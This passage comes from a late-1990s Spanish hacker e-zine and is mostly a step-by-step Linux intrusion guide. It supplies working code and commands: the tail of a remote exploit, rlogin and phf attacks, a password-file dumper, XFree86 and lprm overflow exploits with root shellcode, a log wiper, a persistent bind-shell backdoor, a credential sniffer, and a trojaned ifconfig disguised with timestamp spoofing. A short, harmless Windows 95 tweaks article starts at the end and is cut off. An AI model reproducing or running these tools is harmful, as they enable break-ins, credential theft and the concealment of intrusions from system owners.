Connection refused.\n");
exit(2);
}
signal(SIGPIPE,phand);
signal(SIGINT,ihand);
printf("
Exploiting %s with offset %d...\n",argv[1],a);
sprintf(buf,"
%d LOGIN \"%s\" pass\n", sizeof(shell), username);
write(s,buf,strlen(buf));
while(1)
{
FD_ZERO(&blockme);FD_SET(s,&blockme);FD_SET(0,&blockme);
fflush(stdout);fflush(stdin);
if(select(FD_SETSIZE, &blockme, NULL, NULL, NULL)) {
if(FD_ISSET(0,&blockme)) read_key(s);
if(FD_ISSET(s,&blockme)) read_soc(s);
}
}
}

void read_soc(int sock)
{
static char sbuf[512];
static int i=0;
char c,j;

j=read(sock,&c,1);
if(j<1&&errno!=EAGAIN) {
printf("
Connection dropped.\n");
exit(3);
}
if(i>510)
c='\n';
if(c=='\n') {
sbuf[i++]=c;sbuf[i]=0;i=0;
printf(sbuf);
}
else
sbuf[i++]=c;
}

void read_key(int sock)
{
static char kbuf[512];
static int i=0;
char c,j;

j=read(0,&c,1);
if(i>510)
c='\n';
if(c=='\n') {
kbuf[i++]=c;kbuf[i]=0;i=0;
write(sock,kbuf,strlen(kbuf));
}
else
kbuf[i++]=c;
}

int wee(char *host,int port)
{
struct hostent *h;
struct sockaddr_in s;
int sock;

h=gethostbyname(host);
if(h==NULL)
return -1;
sock=socket(AF_INET,SOCK_STREAM,0);
s.sin_family=AF_INET;
s.sin_port=htons(port);
memcpy(&s.sin_addr,h->h_addr,h->h_length);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)) < 0)
return -1;
fcntl(sock,F_SETFL,O_NONBLOCK);
return sock;
}
-------- final ----------

Otro metodo para conseguir una shell de root desde fuera se da en las distri-
buciones slackware hasta la 3.1 incluida. Se trata de un bug del rlogin, por
lo que no hace falta exploit. Se usa de la siguiente forma: "
rlogin maquina.com
-l -froot".

Tb esta el metodo de usar bugs de scripts cgi, como puede ser el phf, amplia-
mente conocido pero que todavia rula. Por mi experiencia los sistemas con
este bug suelen ser los SunOS, y suelen estar en las universidades. Se usa des-
de el navegador, como puede ser el netscape, de la siguiente formal:
"
http://www.maquina.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd". Esto lo
que hace es imprimir el fichero /etc/passwd pero puede ser usado para ejecu-
tar cualquier comando remotamente.(no me extengo mas porque considero que el
phf ya esta muy explicado en otros articulos).

Otra cosa, muchas distribuciones de linux te montan automaticamente las parti-
ciones msdos, por lo que si tienes acceso al linux de algun colega solo tienes
que ir a /mnt/c: o lo que sea, a /windows/ y bajarte el pwl, pillais,no? :).



3.- CONSEGUIR EL /ETC/PASSWD
*********************************


Una vez que tienes una cuenta lo siguiente es conseguir el fichero de pass de
la peña. Normalmente esta en /etc/passwd,pero puede estar shadow, estando en-
tonces lo importante en /etc/shadow. Me explico. Normalmente los sistemas linux
no se preocupan por quien mira los passwords de los usuarios encriptados(por
algo estan encriptados), o sea que el fichero /etc/passwd que es donde se
guardan los pass es visible para todo el mundo. En cambio hay sitios donde la
seguridad ya es mas necesaria y el archivo con los pass no es visible para
todo el mundo, es entonces cuando se dice que esta shadow. Vamos a analizar una
linea del /etc/passwd de un sistema que no este shadow:

jose:x2rFys28wHAAy:503:508:Jose Manuel:/home/test:/bin/bash

jose --> este es el nombre de usuario (login)
x2rFys28wHAAy --> password encryptado
503 --> este es el uid del usuario
508 --> este es el grupo al que pertenece (gid)
Jose Manuel --> nombre completo del usuario
/home/jose --> directorio home de jose
/bin/bash --> shell de jose


Lo de 503 y 508 sirve para identificar al usuario y a su grupo, ya que linux
por ejemplo no lo identificara por jose sino por 503, por lo tanto cualquier
usuario con uid igual a 503 sera como si fuera a todos los efectos jose. El
root siempre tendra el uid igual a 0.

Lo que mas nos interesa es el password. Unix en general utiliza un metodo de
encriptacion muy complejo,practicamente imposible de desencriptar. Como no se
puede desencriptar lo que podemos hacer es coger una lista de palabras, ir en-
criptandolas una a una y comparandolas con los pass encriptados, cuando haya
una coincidencia ya tenemos un password. Lo he explicado de una forma un poco
simple,espero que se comprenda. Hay multitud de crackeadores de password en la
red, pero esta visto que john the ripper es el mas rapido, asi que recomiendo
este. Ademas,trae una opcion que permite crackear sin lista de palabras, utili-
zando pass que deriven del login del usuario. Por ejemplo si el login es pepe,
pues utiliza como pass pepe1,pepe95...etc. Este es un metodo muy bueno y casi
siempre pilla bastantes password. Se utiliza con "
john -single ficherodepass".

La forma de bajarse el fichero de passwd puede ser por ftp por ejemplo, pero
antes recomiendo hacer una copia del fichero a tu directorio home con un nombre
menos sospechoso,asi en los logs nos constara de que te has bajado el
/etc/passwd.

Lo que pasa es que hay veces en los que conseguir el fichero de pass no es tan
sencillo.Puede estar shadow por ejemplo,o no tener acceso al directorio donde
se encuentre. Si el fichero esta shadow, en /etc/passwd las lineas seran algo
como: "
jose:x:503:508:Jose Manuel:/home/test:/bin/bash". Entonces lo que falta,
el pass, se encuentra encriptado en /etc/shadow,pero con permisos solo de lec-
tura y escritura para el root,de forma que nosotros no podremos leerlo. Menos
mal que hay formas de conseguirlo igualmente :). Como por ejemplo con varias
llamadas a getpwent. El fichero que pongo ahora sirve para los dos casos,que
no tengamos acceso al directorio o al /etc/passwd,o que este shadow.



--------- comienzo ------------
#include <stdio.h>
#include <pwd.h>


struct passwd *pw;


main()
{
while ((pw = getpwent()) != NULL)
{
printf("
%s:",pw->pw_name);
printf("
%s:",pw->pw_passwd);
printf("
%d:",pw->pw_uid);
printf("
%d:",pw->pw_gid);
printf("
%s:",pw->pw_gecos);
printf("
%s:",pw->pw_dir);
printf("
%s\n",pw->pw_shell);
}

endpwent();
}
---------- final ------------

Al ejecutarlo os mostrara el fichero de contraseñas completo, por lo que es
necesario redireccionar su salida a un fichero con >. Ej: "
./conseguirpass >
fichero". Luego te lo bajas por ftp.





3.- CONSEGUIR ACCESO DE ROOT
**********************************


Una vez que tienes una cuenta lo siguiente es conseguir acceso como root. Re-
cuerdo que root es el administrador del sistema y que tiene permiso para hacer
TODO. Antes de intentar hacer nada recomiendo que hagais un "
who" para ver
si el root esta conectado, ya que si haceis cosas raras y esta delante del
ordenata pues a lo mejor se mosquea y tal :). Por cierto, que si son las 10 de
la noche y en el who pone que lleva conectado desde las 8 de la mañana no le
hagais mucho caso :). Aun asi recomiendo intentar hacerse con el root por la
noche.

Si tienes acceso fisico al ordenata,y tiene el Lilo (linux loader) instalado
pues es muy sencillo. Basta con poner en el prompt al arrancar el sistema:
"
linux single",y te carga el linux normalmente solo que con shell de root y
sin pedir ni login,ni pass,ni nada. Supongo que si en vez de "
linux",lo tie-
nes configurado para que arranque con la palabra "
redhat" pues seria "redhat
single".

Si no tienes acceso fisico a la maquina (lo mas normal),tendras que aprovechar
algun fallo (bug) de la distribucion,o un xploit. Los xploits sirven para ex-
plotar los bugs del sistema (la misma palabra lo dice), ya que por ejemplo
para sobreescribir un buffer no los vas a hacer tecleando desde el shell, sino
que lo hace un un programita en C. Hay muchisimos bugs y exploits circulando
por ahi, asi que voy a poner alguno solamente. No son de lo mas reciente pero
funcionara en alguna que otra maquina.

Aqui pongo uno bastante reciente que sobreescribe un buffer en el servidor
de XFREE86, funciona en redhat 4.2,slackware 3.1,caldera 1.1,y creo que en la
debian 1.3.1. En redhat 5.0 creo que no tira. Para que funcione, el directorio
/usr/X11R6 tiene que ser accesible para todo el mundo. Te consigue un shell
de root y no deja logs ni el .bash_history,ni en el wtmp,ni en nada (los ar-
chivos de logs los explicare mas adelante). Por cierto,si alguien no lo sabia,
los archivos en C se compilan con cc -o fichero fichero.c,siendo fichero el
ejecutable y fichero.c el codigo fuente, y tienes que subir el xploit por ftp
a la maquina y luego compilarlo en ella. Bueno, aqui va.

--------- comienzo ----------
/* Try 2 3 4 5 for OFFSET */
#define OFFSET 2

#include <string.h>
#include <unistd.h>
#include <errno.h>

#define LENCODE ( sizeof( Code ) )
char Code[] =
"
\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
"
\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
"
\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
"
\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
"
\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";

char Display[ 0x4001 + OFFSET ] = "
:99999", *ptr = Display + OFFSET + 1;
char *args[] = { "
X", "-nolock", Display, NULL };

main() {
printf("
pHEAR - XFree86 exploit\nby mAChnHEaD <quenelle@iname.com>\n\nYou may
get a root prompt now. If you don't, try different values for OFFSET.\n\n");
dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
__asm__("
movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
memcpy( ptr + 4, ptr, 0x3fc );
memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
execve( "
/usr/X11R6/bin/X", args, args + 3 );
perror( "
execve" );
}
----------- final -----------

Con este se consigue root en muchos linux, pero por si acaso adjunto alguno
mas. Este otro sobreescribe un buffer en /usr/bin/lprm.Se supone que rula en
redhat 4.2,y tienes que modificar el #define PRINTER para que rule. No lo he
probado o sea que no se lo que tienes que poner pero supongo que con #define
PRINTER "
/etc/printcap" funcione,o el nombre de la impresora..eso ya lo
tendreis que averiguar vosotros. Bueno,pongo aqui el codigo.


---------- comienzo -----------
#include <stdio.h>
#define PRINTER "
-Pwhatever"


static inline getesp() {
__asm__("
movl %esp,%eax ");
}

main(int argc, char **argv) {
int i,j,buffer,offset;
long unsigned esp;
char unsigned buf[4096];

unsigned char
shellcode[]="
\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c"
"
\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh";

buffer=990;
offset=3000;

if (argc>1)buffer=atoi(argv[1]);
if (argc>2)offset=atoi(argv[2]);


for (i=0;i<buffer;i++)
buf[i]=0x41; /* inc ecx */

j=0;

for (i=buffer;i<buffer+strlen(shellcode);i++)
buf[i]=shellcode[j++];

esp=getesp()+offset;

buf[i]=esp & 0xFF;
buf[i+1]=(esp >> 8) & 0xFF;
buf[i+2]=(esp >> 16) & 0xFF;
buf[i+3]=(esp >> 24) & 0xFF;

buf[i+4]=esp & 0xFF;
buf[i+5]=(esp >> 8) & 0xFF;
buf[i+6]=(esp >> 16) & 0xFF;
buf[i+7]=(esp >> 24) & 0xFF;

printf("
Offset: 0x%x\n\n",esp);

execl("
/usr/bin/lprm","lprm",PRINTER,buf,NULL);
}
---------- final -----------


Bueno, no pongo mas que sino se alarga mucho. Solo teneis que buscar
por la red con la palabra clave xploit y apareceran mogollon de webs
interesantes.


4.- BORRANDO NUESTRAS HUELLAS
***********************************


Esto si que es importante, yo mas bien diria que es lo mas importante, ya que
si no borras todas las huellas que has ido dejando (que son muchas) pueden
pillarte con todas sus consecuencias. ¿ Que te pareceria que despues de todo
el trabajo que te ha llevado conseguir el root te cierran el acceso por no
borrar tus huellas correctamente ? Ya no digo nada si le da por denunciarte ..

Los ficheros de logs varian de un linux a otro, pero mas bien varian de direc-
torio, todo lo demas se mantiene. Un encargado de grabar nuestros logs es el
syslog. Este es un demonio que guarda diferentes tipos de logs como los usua-
rios que se conectaron,su ip,etc. Para ver exactamente que logs guarda y en
que ficheros puedes hacer un "
cat /etc/syslog.conf",de esta forma veras exac-
tamente que es lo que hace. Normalmente los guarda en /var/log,y los mas impor-
tantes son messages,secure y xferlog. Estos son ficheros de textos normales,por
lo que modificarlos es muy sencillo. Messages es un poco de todo, guarda los
usuarios que se conectaron,su ip,etc.,por lo que es un coñazo la verdad. Se-
cure guarda solo las ips y los demonios que usaron, por ejemplo que 195.32.2.1
se conecto al ftp el 1 de mayo a las 2 de la tarde, pero no guarda los ficheros
que te bajes ni nada. Y xferlog es un fichero solo del ftp,es decir guarda
conexiones,ficheros que te bajaste,etc. Para borrarlo es muy sencillo. For
example: tu ip es ctv23.ctv.es (bueno,tu host mejor dicho), para borrarla del
/var/log/messages pues haces "
grep -v ctv23 /var/log/messages > mes". Ahora en
el fichero mes tienes una copia del messages pero sin las lineas en las que
aparece ctv23,luego lo copias sobreescribiendo /var/log/messages. Bueno,pues
asi con el xferlog y el secure. Aunque tb puedes editarlos con el vim y
borrarlos manualmente claro :).

Pero todavia hay mas ficheros de logs. Por ejemplo el bash guarda una copia
de todos los comandos utilizados en el directorio home en un fichero llama-
do .bash_history. Para evitarlo pon "
unset HISTFILE" en mitad de una sesion,
ya que el log se actualiza cuando cierres la conexion. Es decir,si por ejemplo
te conectas y borras el .bash_history no te servira de nada,ya que los comandos
los escribe cuando te desconectes del server. En cambio si pones unset HISTFILE
no los escribira cuando desconectes.

Otros ficheros de logs importantes son lastlog,wtmp y utmp.No estan en forma-
to de texto por lo que no podras leerlos normalmente.

Lastlog --> Se encuentra normalmente en /var/log/lastlog,y guarda cuando
se conecto por ultima vez un usuario y desde donde.
Wtmp --> Se encuentra normalmente en /var/log/wtmp, y guarda los nombres y las
ips de todos los usuarios que se conectaron alguna vez a la maquina.
Utmp --> Se encuentra normalmente en /var/run/utmp, y guarda los usuarios que
se encuentran conectados en ese momento a la maquina.

Para borrarlos hace falta un programa especial que adjunto aqui. Hay muchos y
este no es de los mejores porque no borra el registro,simplemente pone las
entradas a 0,con lo que un root avanzado podria mosquearse. Tb decir que al
hacer un "
who" busca los usuarios en el utmp,por lo que si te borras de el y
cualquier usuario hace un who,incluido el root, no te vera. Sirve para que
no te detecten a simple vista pero tampoco seria muy complicado encontrarte,
asi que tampoco te creas invisible :). Bueno,pego aqui el codigo.

--------- empieza -----------
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "
/var/log/wtmp"
#define UTMP_NAME "
/var/run/utmp"
#define LASTLOG_NAME "
/var/log/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("
%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("
Zap2!\n");
} else
printf("
Error.\n");
}
--------- final -----------

Para usarlo se usa con "
./z2 nombredeusuario".




5.- DEJANDO PUERTAS TRASERAS
************************************



Bueno,y vosotros os preguntareis si siempre que os conecteis teneis que
rular el xploit o el bug,borrar huellas,etc. con todo el coñazo que eso
supone. Pues la respuesta es no. Lo mas comodo es instalar una "
backdoor"
o puerta trasera. Una puerta trasera es una manera de entrar en un sis-
tema de forma que nadie se entere de que has entrado,sin logs ni rollazos,
y consiguiendo el root al momento. Por supuesto para instalar una tienes
que haber conseguido el root anteriormente :). Normalmente se instalan sobre-
escribiendo un fichero del sistema por uno modificado,es decir,un troyano.
Por ejemplo,sobreescribes el /bin/login por uno que te deje entrar con
un login:pass que definas tu y sin dejar ningun log..bonito,no? :). Hay
por ahi bastantes troyanos del login,pero todos tienen un defecto (o al
menos yo no vi ninguno), que pasa si el passwd esta shadow? Pues por lo
menos los que yo vi, no rulan. Por eso voy a poner aqui otro metodo, que
consiste en crear un puerto en la maquina con un numero raro y que al hacer
un telnet a ese puerto te de una shell de root sin pass y sin logs. Pongo
aqui el codigo y luego lo explico.

---------- comienzo -----------
/* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by pluvius@io.org */
/* don't forget.. when you connect to the port.. commands are like: */
/* "
ls -l;" or "exit;" (don't forget the ';') */
#define PORT 31337
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr; struct sockaddr_in client_addr;
int main () { soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1) exit(-1); bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT); soc_rc = bind(soc_des, (struct sockaddr *)
&serv_addr, sizeof(serv_addr)); if (soc_rc != 0) exit(-1); if (fork() != 0)
exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if (fork() != 0) exit(0);
soc_rc = listen(soc_des, 5); if (soc_rc != 0) exit(0); while (1) { soc_len =
sizeof(client_addr); soc_cli = accept(soc_des, (struct sockaddr *)
&client_addr,&soc_len); if (soc_cli < 0) exit(0); cli_pid = getpid(); server_pid
= fork();
if (server_pid != 0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2);
execl("
/bin/sh","sh",(char *)0); close(soc_cli); exit(0); } close(soc_cli);}}

---------- final ----------

Este programa crea un puerto que tu le digas (lo defines en PORT), y al co-
nectar con ese puerto ejecuta el /bin/sh con privilegios del que ejecuto
el programa. Es decir que si lo ejecuto el root tiene privilegios de root,
si lo ejecuto pepe tiene privilegios de pepe,etc. Para instalarlo tienes que
compilarlo con cc -o file file.c, y luego lo instalas ejecutandolo simple-
mente con ./file. Luego desde tu casa haces un "
telnet maquina 31337" o el
que sea y ya estas dentro. Para ejecutar comandos tienes que poner siempre ;,
es decir "
ls;","who;",etc. y para desconectarte hay que poner "exit;".

NOTA: Al hacer un ps (no es hacer un pis,eh? :D) se vera mientras estes
conectado la primera vez que lo corras. Me explico,tu pones ./file para
ejecutarlo y al hacer un ps se vera,pero nada mas que desconectes ya no
se vera mas,captais? O sea,genial porque el root ni se entera.

Pero que pasa si el root resetea el ordenata? Pues que el programa se cierra,
evidentemente. Para ello yo recomiendo copiar el programa ya compilado a
/etc/rc.d/init.d/ con un nombre como stoke,o alguno que no suene raro. Luego
editais el fichero /etc/rc.d/rc y en mitad del fichero para que no cante
mucho le añadis la linea /etc/rc.d/init.d/stoke. Asi si se resetea el ordenata
no importa porque arrancara el programa de nuevo con privilegios de root.




6.- INSTALANDO UN SNIFFER
**********************************


Un sniffer es un programa que se usa para conseguir mas password de otros
sitios a partir de una maquina que ya hayas hackeado y de la que tengas el
control. Es decir, una vez que eres root de un ordenata, ¿que te impide ins-
talar un programa que grabe en un log el principio de las sesiones de ftp y
telnet (u otros) que se abran desde esa maquina? Por ejemplo, que grabe las
10 primeras lineas de todas las sesiones de unos determinados puertos. Como
es logico entre esas diez lineas iran el login y el password, por lo que po-
dras conseguir cuentas de otros ordenadores facilmente, genial,no? :).

Pues bien, eso es lo que hace un sniffer. Me falto decir que el sniffer solo
rula si tienes el ordenador conectado en red a traves de una tarjeta ethernet.
Es decir,que si consigues hackear el ordenata de un colega, no le pongas un
sniffer porque (a no ser que lo tenga conectado en red,claro) no te servira
de nada, igualmente que si lo intentas instalar en tu propia maquina.

Ahora pongo un sniffer para linux, para que lo useis con fines didacticos :).
Tienes que definir el fichero de salida, es decir donde guardara los login y
lo pass, en la linea #define TCPLOG. Captura los pass de los puertos del ftp,
telnet y pop.Para ejecutarlo tienes que dejarlo corriendo en background, en
segundo plano. Para ello al ejecutarlo tienes que poner "
./file &". Al hacer
un ps se vera el sniffer solo hasta que te desconectes,luego ya no se vera
ni con ps ni con top.

------- comienzo --------
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>


int openintf(char *);
int read_tcp(int);
int filter(void);
int print_header(void);
int print_data(int, char *);
char *hostlookup(unsigned long int);
void clear_victim(void);
void cleanup(int);


struct etherpacket
{
struct ethhdr eth;
struct iphdr ip;
struct tcphdr tcp;
char buff[8192];
}ep;

struct
{
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
int bytes_read;
char active;
time_t start_time;
} victim;

struct iphdr *ip;
struct tcphdr *tcp;
int s;
FILE *fp;

#define CAPTLEN 512
#define TIMEOUT 30
#define TCPLOG "
.ttg19"

int openintf(char *d)
{
int fd;
struct ifreq ifr;
int s;
fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
if(fd < 0)
{
perror("
cant get SOCK_PACKET socket");
exit(0);
}
strcpy(ifr.ifr_name, d);
s=ioctl(fd, SIOCGIFFLAGS, &ifr);
if(s < 0)
{
close(fd);
perror("
cant get flags");
exit(0);
}
ifr.ifr_flags |= IFF_PROMISC;
s=ioctl(fd, SIOCSIFFLAGS, &ifr);
if(s < 0) perror("
cant set promiscuous mode");
return fd;
}

int read_tcp(int s)
{
int x;
while(1)
{
x=read(s, (struct etherpacket *)&ep, sizeof(ep));
if(x > 1)
{
if(filter()==0) continue;
x=x-54;
if(x < 1) continue;
return x;
}
}
}

int filter(void)
{
int p;
p=0;
if(ip->protocol != 6) return 0;
if(victim.active != 0)
if(victim.bytes_read > CAPTLEN)
{
fprintf(fp, "
\n----- [CAPLEN Exceeded]\n");
clear_victim();
return 0;
}
if(victim.active != 0)
if(time(NULL) > (victim.start_time + TIMEOUT))
{
fprintf(fp, "
\n----- [Timed Out]\n");
clear_victim();
return 0;
}
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==109) p=1; /* pop2 */
if(ntohs(tcp->dest)==143) p=1; /* imap2 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
if(victim.active == 0)
if(p == 1)
if(tcp->syn == 1)
{
victim.saddr=ip->saddr;

  
victim.daddr=ip->daddr;
victim.active=1;
victim.sport=tcp->source;
victim.dport=tcp->dest;
victim.bytes_read=0;
victim.start_time=time(NULL);
print_header();
}
if(tcp->dest != victim.dport) return 0;
if(tcp->source != victim.sport) return 0;
if(ip->saddr != victim.saddr) return 0;
if(ip->daddr != victim.daddr) return 0;
if(tcp->rst == 1)
{
victim.active=0;
alarm(0);
fprintf(fp, "\n----- [RST]\n");
clear_victim();
return 0;
}
if(tcp->fin == 1)
{
victim.active=0;
alarm(0);
fprintf(fp, "\n----- [FIN]\n");
clear_victim();
return 0;
}
return 1;
}


int print_header(void)
{
fprintf(fp, "\n");
fprintf(fp, "%s => ", hostlookup(ip->saddr));
fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));
}

int print_data(int datalen, char *data)
{
int i=0;
int t=0;

victim.bytes_read=victim.bytes_read+datalen;
for(i=0;i != datalen;i++)
{
if(data[i] == 13) { fprintf(fp, "\n"); t=0; }
if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
if(t > 75) {t=0;fprintf(fp, "\n");}
}
}


main(int argc, char **argv)
{
s=openintf("eth0");
ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
signal(SIGHUP, SIG_IGN);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
signal(SIGKILL, cleanup);
signal(SIGQUIT, cleanup);
if(argc == 2) fp=stdout;
else fp=fopen(TCPLOG, "at");
if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);}
clear_victim();
for(;;)
{
read_tcp(s);
if(victim.active != 0)
print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
fflush(fp);
}
}

char *hostlookup(unsigned long int in)
{
static char blah[1024];
struct in_addr i;
struct hostent *he;

i.s_addr=in;
he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
if(he == NULL) strcpy(blah, inet_ntoa(i));
else strcpy(blah, he->h_name);
return blah;
}

void clear_victim(void)
{
victim.saddr=0;
victim.daddr=0;
victim.sport=0;
victim.dport=0;
victim.active=0;
victim.bytes_read=0;
victim.start_time=0;
}

void cleanup(int sig)
{
fprintf(fp, "Exiting...\n");
close(s);
fclose(fp);
exit(0);
}
-------- final ---------


Pero en cambio, detectar un sniffer es muy sencillo. Con la orden "ifconfig" y
fijandose si aparece la palabra PROMISC se sabe facilmente. Esto lo hace muy
vulnerable, y si un root avanzado se da cuenta no tardara en encontrar el fi-
chero de logs del sniffer. Por cierto, esto es importante. Un sniffer captura
los login y pass de la peña que accede a otros ordenatas desde la maquina en la
que esta instalado,pero junto con el login y pass tambien captura su ip. A eso
tb le sumamos que tb pilla los pass y las ips de la gente que accede a la ma-
quina del sniffer,es decir,a si mismas. ¿Pues que pasaria si habeis borrado
todas las huellas del syslog,etc. y no borrais vuestra propia info del log
del sniffer? Os lo imaginais,¿no? Hay que tener cuidado con eso..no os vaya
a dar un disgusto :).

Para resolver lo del PROMISC del ifconfig hay que instalar un troyano. Es de-
cir, un fichero modificado del ifconfig. Se compila y se copia sobreescribiendo
el /sbin/ifconfig. Hay varios circulando por la red, sobre todo incluidos den-
tro de rootkits. En la misma pagina de este ezine (raregazz.islatortuga.com) lo
teneis dentro del rootkit para linux en el apartado de bugs/utilidades. Y ya
que estamos hablando de troyanos no esta de paso comentar la orden "touch",que
sirve para cambiar la fecha de un archivo. Por ejemplo si metes un ifconfig con
fecha de ayer el root a lo mejor se mosquea :). Para modificarle la fecha lo
mejor es pillarla de otro archivo del mismo directorio. For example: en el di-
rectorio /sbin hay un archivo llamado "halt",cuya linea completa es:

"-rwxr-xr-x 1 root root 6564 Oct 2 1997 /sbin/halt*"

En cambio la del nuevo ifconfig es:

"-rwxr-xr-x 1 root root 23368 May 8 1998 /sbin/ifconfig*"

Como veis,la fecha del ifconfig canta un poco. Pues poneis "touch -r /sbin/halt
/sbin/ifconfig" y la nueva linea del ifconfig pasa a a ser:

"-rwxr-xr-x 1 root root 23368 Oct 2 1997 /sbin/ifconfig*"

Es decir, pilla la fecha de /sbin/halt y la copia a /sbin/ifconfig, asi ya
no canta tanto que lo has modificado. Despues de haber sobreescrito el ifconfig
por un troyano ya no aparecera lo de PROMISC, aunque hayas instalado un sni-
ffer.


7.- DESPEDIDA
*********************


Bueno,pues esto ha llegado a su fin. Espero que este texto os haya sido util,
sobre todo a la gente que empieza. Desde aqui quiero saludar a mi madre,a mi
abuela que me estara viendo .. XD. En serio, saludo a Minerva, a Pantani, y a
toda la comunidad hacker hispana. Un saludo y hasta otra.


Ironbox
ironboxx@hotmail.com

____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-------------------------------------------------------
-----------------Hacking WIN 95------------------------
---------------by 12r43l Overdrive---------------------
---------------12r@antisocial.com----------------------
-------------------------------------------------------

Bueno como todos sabemos desgraciadamente Window$ 95 es el sistema operativo
para PC de mayor uso en el planeta. Por lo tanto este articulo tiene la
finalidad de ayudar a optimizar tu sistema asi como de darle un poco de
"estilo" ;-).

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Comenzemos por editar el archivo msdos.sys
NOTA: Recuerda que tienes que cambiar los atributos de este archivo para
poder editarlo.

En la seccion de Options:

[Options]

BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows..."
no aparece.

BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95.

BootMenuDefault = 1 El numero de opcion por default.

BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado.

Logo = 0 No despliega la imagen del logo de arranque de Win95.

BootMulti = 1 Hace disponible un doble booteo con DOS.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Para Cambiar las pantallas de inicio y final de Win95 puedes abrir con
cualquier editor de imagenes los archivos Logo.sys, Logow.sys y Logos.sys
NOTA: No cambies el tama¤o de estos.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Ahora vamos con algo mas divertido: El REGISTRO de Win95!. Si ya estas
